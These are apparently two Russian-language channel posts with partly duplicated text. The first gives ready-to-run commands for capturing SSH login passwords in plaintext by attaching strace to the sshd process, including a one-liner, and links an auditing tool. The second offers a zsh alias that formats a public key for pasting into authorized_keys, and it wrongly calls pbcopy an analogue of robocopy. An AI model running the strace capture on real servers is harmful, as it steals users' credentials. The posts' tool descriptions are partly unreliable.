Новость бударажущая ум и представление о безопасности Linux*
Так сказать мир был до этой новости и теперь…
—
Получаем пароль от SSH в открытом виде
1. получаем точный идентификатор sshd
2. Отслеживаем системные вызовы
Ну или одной строкой
Для танкистов - смотрите вывод
А еще более печально, есть тула
https://github.com/ncsa/ssh-auditor
#ssh #sniff #password
Так сказать мир был до этой новости и теперь…
—
Получаем пароль от SSH в открытом виде
1. получаем точный идентификатор sshd
pgrep -l sshd
2. Отслеживаем системные вызовы
strace -f -p <ssh_PID> -e trace=write -o capture
Ну или одной строкой
strace -f -p $(service sshd status |grep PID|awk "{print \$3}") -e trace=write -o capture
Для танкистов - смотрите вывод
cat capture
А еще более печально, есть тула
https://github.com/ncsa/ssh-auditor
#ssh #sniff #password
Если Вы используете для автоматизации команд alias'ы для #zshrc и часто добавляете свой #id_rsa.pub на другие хосты, то это дело можно автоматизировать, чтобы не открывать каждый раз ключ в текстовике и не копировать команды, затем их вставлять или оставлять следы в bash_history - просто импользуйте альяс #ssh_key:
Команда заберет Ваш публичный ключ и обрамит его кодом для вставки на другой хост...
PS в примере используется утилита #pbcopy - это аналог #robocopy в Linux для MacOS
#automatization
alias ssh_key='public_key=$(cat ~/.ssh/id_rsa.pub); command="echo '\''$public_key'\'' >> ~/.ssh/authorized_keys"; echo "$command" | pbcopy;'
Команда заберет Ваш публичный ключ и обрамит его кодом для вставки на другой хост...
PS в примере используется утилита #pbcopy - это аналог #robocopy в Linux для MacOS
#automatization